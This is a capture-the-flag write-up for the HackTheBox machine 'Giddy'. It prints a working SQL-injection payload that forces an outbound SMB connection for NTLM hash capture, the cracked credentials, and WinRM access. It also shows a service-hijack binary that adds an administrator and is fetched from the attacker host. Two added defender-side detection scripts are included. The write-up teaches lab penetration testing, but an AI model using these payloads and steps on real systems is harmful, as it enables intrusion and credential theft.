HTB — Giddy

Web · Medium · Windows

SQL injection via a stored procedure (xp_dirtree) triggers an outbound SMB connection and NTLM hash capture. Responder catches the hash, which is cracked for WinRM access. Ubiquiti UniFi Video privesc via service abuse.

November 25, 2024 · HackTheBox

#SQLi #NTLM #Responder #WinRM
nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 12:27 EST
Nmap scan report for 10.10.10.104
Host is up (0.023s latency).
Not shown: 65531 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2024-11-25T17:29:44+00:00; 0s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-11-24T17:17:30
|_Not valid after: 2025-05-26T17:17:30
|_ssl-date: 2024-11-25T17:29:44+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.38 ms 10.10.14.1
2 24.50 ms 10.10.10.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.04 seconds
```

80/tcp open http

```sh
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
```

feroxbuster

```sh
feroxbuster --url http://10.10.10.104/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.104/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 157c http://10.10.10.104/aspnet_client => http://10.10.10.104/aspnet_client/
200 GET 362l 2183w 158770c http://10.10.10.104/giddy.jpg
200 GET 32l 55w 700c http://10.10.10.104/
302 GET 3l 8w 160c http://10.10.10.104/Remote/ => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fRemote%2f
302 GET 3l 8w 141c http://10.10.10.104/Remote/default.aspx => http://10.10.10.104/Remote/en-US/logon.aspx
302 GET 3l 8w 157c http://10.10.10.104/remote => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fremote
404 GET 40l 156w 1888c http://10.10.10.104/con
301 GET 2l 10w 157c http://10.10.10.104/Aspnet_client => http://10.10.10.104/Aspnet_client/
404 GET 40l 156w 1902c http://10.10.10.104/aspnet_client/con
301 GET 2l 10w 147c http://10.10.10.104/mvc => http://10.10.10.104/mvc/
301 GET 2l 10w 157c http://10.10.10.104/aspnet_Client => http://10.10.10.104/aspnet_Client/
404 GET 40l 156w 1888c http://10.10.10.104/aux
404 GET 40l 156w 1902c http://10.10.10.104/aspnet_client/aux
301 GET 2l 10w 155c http://10.10.10.104/mvc/scripts => http://10.10.10.104/mvc/scripts/
301 GET 2l 10w 154c http://10.10.10.104/mvc/images => http://10.10.10.104/mvc/images/
301 GET 2l 10w 155c http://10.10.10.104/mvc/content => http://10.10.10.104/mvc/content/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Scripts => http://10.10.10.104/mvc/Scripts/
301 GET 2l 10w 155c http://10.10.10.104/mvc/account => http://10.10.10.104/mvc/account/
301 GET 2l 10w 154c http://10.10.10.104/mvc/Images => http://10.10.10.104/mvc/Images/
200 GET 4l 14w 888c http://10.10.10.104/mvc/Images/accent.png
200 GET 16l 102w 6719c http://10.10.10.104/mvc/Images/orderedList6.png
200 GET 16l 83w 6196c http://10.10.10.104/mvc/Images/orderedList8.png
200 GET 6l 16w 1176c http://10.10.10.104/mvc/Images/orderedList1.png
200 GET 7l 24w 1332c http://10.10.10.104/mvc/Images/orderedList2.png
200 GET 14l 74w 5095c http://10.10.10.104/mvc/Images/bullet.png
200 GET 15l 82w 6008c http://10.10.10.104/mvc/Images/orderedList4.png
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/themes => http://10.10.10.104/mvc/content/themes/
200 GET 7l 27w 1335c http://10.10.10.104/mvc/Images/orderedList3.png
200 GET 17l 87w 6109c http://10.10.10.104/mvc/Images/orderedList0.png
200 GET 17l 82w 5981c http://10.10.10.104/mvc/Images/orderedList5.png
200 GET 4l 18w 972c http://10.10.10.104/mvc/Images/heroAccent.png
200 GET 18l 95w 6158c http://10.10.10.104/mvc/Images/orderedList9.png
200 GET 17l 95w 6493c http://10.10.10.104/mvc/Images/orderedList7.png
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/css
302 GET 3l 8w 157c http://10.10.10.104/Remote => http://10.10.10.104/Remote/default.aspx?ReturnUrl=%2fRemote
404 GET 40l 156w 1902c http://10.10.10.104/Aspnet_client/con
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/CSS
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/Themes => http://10.10.10.104/mvc/content/Themes/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Content => http://10.10.10.104/mvc/Content/
301 GET 2l 10w 151c http://10.10.10.104/mvc/obj => http://10.10.10.104/mvc/obj/
301 GET 2l 10w 155c http://10.10.10.104/mvc/Account => http://10.10.10.104/mvc/Account/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/css
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/themes => http://10.10.10.104/mvc/Content/themes/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/themes/base => http://10.10.10.104/mvc/content/themes/base/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/CSS
200 GET 1l 182w 7579c http://10.10.10.104/mvc/content/Css
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/Themes => http://10.10.10.104/mvc/Content/Themes/
301 GET 2l 10w 157c http://10.10.10.104/mvc/obj/debug => http://10.10.10.104/mvc/obj/debug/
301 GET 2l 10w 158c http://10.10.10.104/mvc/Properties => http://10.10.10.104/mvc/Properties/
301 GET 2l 10w 158c http://10.10.10.104/mvc/properties => http://10.10.10.104/mvc/properties/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/Themes/base => http://10.10.10.104/mvc/content/Themes/base/
301 GET 2l 10w 167c http://10.10.10.104/mvc/Content/themes/base => http://10.10.10.104/mvc/Content/themes/base/
301 GET 2l 10w 154c http://10.10.10.104/mvc/IMAGES => http://10.10.10.104/mvc/IMAGES/
200 GET 1l 182w 7579c http://10.10.10.104/mvc/Content/Css
301 GET 2l 10w 162c http://10.10.10.104/mvc/content/THEMES => http://10.10.10.104/mvc/content/THEMES/
301 GET 2l 10w 167c http://10.10.10.104/mvc/Content/Themes/base => http://10.10.10.104/mvc/Content/Themes/base/
301 GET 2l 10w 162c http://10.10.10.104/mvc/Content/THEMES => http://10.10.10.104/mvc/Content/THEMES/
301 GET 2l 10w 168c http://10.10.10.104/aspnet_client/system_web => http://10.10.10.104/aspnet_client/system_web/
301 GET 2l 10w 167c http://10.10.10.104/mvc/content/THEMES/base => http://10.10.10.104/mvc/content/THEMES/base/
[##>-----------------] - 87s 87796/750138 10m found:59 errors:1
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_10_10_104_-1732556114.state ...
[##>-----------------] - 87s 87896/750138 10m found:59 errors:1
[##########>---------] - 87s 15890/30000 183/s http://10.10.10.104/
[##########>---------] - 86s 15537/30000 180/s http://10.10.10.104/aspnet_client/
[######>-------------] - 74s 9049/30000 123/s http://10.10.10.104/Aspnet_client/
[##>-----------------] - 64s 3038/30000 48/s http://10.10.10.104/mvc/
[##>-----------------] - 62s 4277/30000 69/s http://10.10.10.104/aspnet_Client/
[#>------------------] - 56s 2894/30000 52/s http://10.10.10.104/mvc/images/
[#>------------------] - 56s 2859/30000 51/s http://10.10.10.104/mvc/scripts/
[#>------------------] - 55s 2830/30000 51/s http://10.10.10.104/mvc/content/
[#>------------------] - 55s 2819/30000 51/s http://10.10.10.104/mvc/Scripts/
[#>------------------] - 55s 2756/30000 50/s http://10.10.10.104/mvc/account/
[#>------------------] - 55s 2698/30000 49/s http://10.10.10.104/mvc/Images/
[#>------------------] - 54s 2646/30000 49/s http://10.10.10.104/mvc/content/themes/
[#>------------------] - 50s 2277/30000 46/s http://10.10.10.104/mvc/content/Themes/
[#>------------------] - 49s 2245/30000 46/s http://10.10.10.104/mvc/Content/
[#>------------------] - 49s 2215/30000 45/s http://10.10.10.104/mvc/obj/
[#>------------------] - 48s 2135/30000 44/s http://10.10.10.104/mvc/Account/
[#>------------------] - 48s 2100/30000 44/s http://10.10.10.104/mvc/Content/themes/
[#>------------------] - 40s 1684/30000 42/s http://10.10.10.104/mvc/Content/Themes/
[#>------------------] - 40s 1652/30000 42/s http://10.10.10.104/mvc/obj/debug/
[#>------------------] - 38s 1576/30000 41/s http://10.10.10.104/mvc/Properties/
[>-------------------] - 37s 1494/30000 41/s http://10.10.10.104/mvc/properties/
[>-------------------] - 31s 1203/30000 39/s http://10.10.10.104/mvc/IMAGES/
[>-------------------] - 28s 1050/30000 38/s http://10.10.10.104/mvc/content/THEMES/
[>-------------------] - 16s 451/30000 29/s http://10.10.10.104/mvc/Content/THEMES/
[>-------------------] - 8s 232/30000 29/s http://10.10.10.104/aspnet_client/system_web/
[--------------------] - 0s 0/30000 - http://10.10.10.104/giddy.jpg
```

/mvc/search

- SQL injection: the search on /mvc/search is passed to SQL Server unsanitised. Injecting a call to the xp_dirtree extended stored procedure with a UNC path makes the database server authenticate to an attacker-controlled SMB share, which leaks the service account's NTLMv2 response.

```sql
test' EXEC master..xp_dirtree '\\10.10.14.4\share\'---
```

capturing hashes

```sh
sudo impacket-smbserver share -smb2support ./
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49722)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:7f1f1342...:01010000000000000033c3fe843fdb014a4eee369e48150f00000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e00070008000033c3fe843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:f7d6ed28...:010100000000000080c95bff843fdb0191a79d16709ee48100000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e000700080080c95bff843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000
```

hashcat

```sh
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
STACY::GIDDY:aaaaaaaaaaaaaaaa:f7d6ed28...:010100000000000080c95bff843fdb0191a79d16709ee48100000000010010006c0043006300460056004b0041005200030010006c0043006300460056004b00410052000200100058004f00440076006200560063006e000400100058004f00440076006200560063006e000700080080c95bff843fdb0106000400020000000800300030000000000000000000000000300000f0d9f35c5ef0c031ab224de3728c1a62676b15421cfca7d3a036103a7e6d97260a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003400000000000000000000000000:xNnWo6272k7x
```

creds

Stacy:xNnWo6272k7x
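As an added defender-side example (not from the original writeup), a Python scanner for IIS W3C access logs that URL-decodes each query string and flags calls to xp_dirtree and similar extended procedures, reporting any UNC host they point at, as in the payload injected into /mvc/search above. The log lines are constructed; the `q` parameter name and the log field layout are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Extended stored procedures that make SQL Server open a UNC path (leaking the
# service account's NTLM response) or execute commands.
OUTBOUND_XPS = {"xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_cmdshell"}
XP_RE = re.compile(r"\b(?:master\s*\.\.\s*)?(xp_\w+)", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([0-9a-z.\-]+)\\", re.IGNORECASE)

# Constructed IIS W3C lines (field layout assumed; parameter name `q` assumed).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-11-25 17:29:44 10.10.14.4 GET /mvc/search q=giddy 200
2024-11-25 17:30:01 10.10.14.4 GET /mvc/search q=test%27+EXEC+master..xp_dirtree+%27%5C%5C10.10.14.4%5Cshare%5C%27-- 500
2024-11-25 17:30:09 10.10.14.4 GET /mvc/search q=test%2527%2520EXEC%2520xp_fileexist%2520%2527C:%255Cx%2527-- 500
"""

def normalize(query: str) -> str:
    """URL-decode twice (defeats double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(query)))

def inspect_query(query: str):
    """Return a finding for a suspicious xp_* call in the query string, else None."""
    text = normalize(query)
    xp = XP_RE.search(text)
    if not xp or xp.group(1).lower() not in OUTBOUND_XPS:
        return None
    unc = UNC_RE.search(text)
    return {"proc": xp.group(1).lower(), "unc_host": unc.group(1) if unc else None}

def scan_iis_log(lines):
    """Return one finding per log line whose query string matches."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, client, _method, stem, query, _status = fields[:7]
        hit = inspect_query(query)
        if hit:
            findings.append({"time": f"{date} {time}", "client": client, "path": stem, **hit})
    return findings

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(f)
```

A UNC host outside your own address space in a finding is the signal to correlate with outbound SMB (445) connection attempts from the database server.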
```sh
nxc rdp 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
RDP 10.10.10.104 3389 GIDDY [*] Windows 10 or Windows Server 2016 Build 14393 (name:GIDDY) (domain:Giddy) (nla:True)
RDP 10.10.10.104 3389 GIDDY [+] Giddy\stacy:xNnWo6272k7x
nxc winrm 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
WINRM 10.10.10.104 5985 GIDDY [*] Windows 10 / Server 2016 Build 14393 (name:GIDDY) (domain:Giddy)
WINRM 10.10.10.104 5985 GIDDY [+] Giddy\stacy:xNnWo6272k7x (Pwn3d!)
```

evil-winrm

```sh
evil-winrm -i 10.10.10.104 -u stacy -p 'xNnWo6272k7x'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy
```

user.txt

```sh
*Evil-WinRM* PS C:\Users\Stacy\Desktop> cat user.txt
f1624dea...
```

privilege escalation

UniFi Video

- https://www.exploit-db.com/exploits/43390

The UniFi Video service runs as SYSTEM and, when it starts, executes taskkill.exe from C:\ProgramData\unifi-video. The directory's ACL grants BUILTIN\Users write access, so a standard user can place a binary with that name there and have it run as SYSTEM.

```sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> icacls .\
.\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\unifi-video> echo 'test'>test.txt
```
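As an added example (not part of the writeup), a small Python audit that parses icacls output like the listing above and reports ACEs granting write-type rights to low-privileged principals, which is exactly the weakness that lets a standard user plant a binary in a directory a SYSTEM service executes from. The sample is copied from the listing; paths containing spaces are not handled (an assumption noted in the code).

```python
import re

# Identities every local user effectively holds; write rights for them on a
# directory a SYSTEM service loads binaries from are a privilege-escalation risk.
LOW_PRIV = {"builtin\\users", "everyone", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow creating or modifying files (simple and specific forms).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "DC"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z,]+\))+)$")

# Copied from the icacls listing above (constructed sample, not a live capture).
SAMPLE_ICACLS = r""".\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
"""

def parse_icacls(output: str):
    """Return (path, [(principal, [flag groups])]) from `icacls <path>` output."""
    path, aces = None, []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if path is None:  # first ACE line carries the path (assumed to contain no spaces)
            path, _, line = line.partition(" ")
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("who"), re.findall(r"\(([^)]+)\)", m.group("flags"))))
    return path, aces

def weak_aces(output: str):
    """List (principal, write rights) for ACEs that let low-privileged users write."""
    _, aces = parse_icacls(output)
    weak = []
    for who, flags in aces:
        rights = set(flags[-1].split(","))  # last parenthesised group is the permission set
        granted = rights & WRITE_RIGHTS
        if who.lower() in LOW_PRIV and granted:
            weak.append((who, sorted(granted)))
    return weak

if __name__ == "__main__":
    for who, rights in weak_aces(SAMPLE_ICACLS):
        print(f"{who} can write: {','.join(rights)}")
```

Run the same check against every directory a service's ImagePath or working directory resolves to; the fix is to remove the WD/AD grant for BUILTIN\Users or relocate the service files.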
```powershell
*Evil-WinRM* PS C:\ProgramData\unifi-video> Get-Service "Ubiquiti UniFi Video"
Status Name DisplayName
------ ---- -----------
Running UniFiVideoService Ubiquiti UniFi Video
```

```sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
```

```sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Get-Service "Ubiquiti UniFi Video"
Status Name DisplayName
------ ---- -----------
Stopped UniFiVideoService Ubiquiti UniFi Video
```

taskkill.c

```c
#include <stdlib.h>

/* Compiled as taskkill.exe and dropped in C:\ProgramData\unifi-video so that
   the UniFi Video service runs it as SYSTEM on start: it creates a local
   user and adds it to the local Administrators group. */
int main(void)
{
    system("net user test Password123 /add");
    system("net localgroup administrators test /add");
    return 0;
}
```

```sh
x86_64-w64-mingw32-gcc taskkill.c -o taskkill.exe
```

```sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Invoke-WebRequest http://10.10.14.4/taskkill.exe -OutFile taskkill.exe
```

```sh
*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"
```

```powershell
*Evil-WinRM* PS C:\ProgramData\unifi-video> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
test
The command completed successfully.
```

```sh
evil-winrm -i 10.10.10.104 -u test -p 'Password123'
```

root.txt

```sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b2e76f8c...
```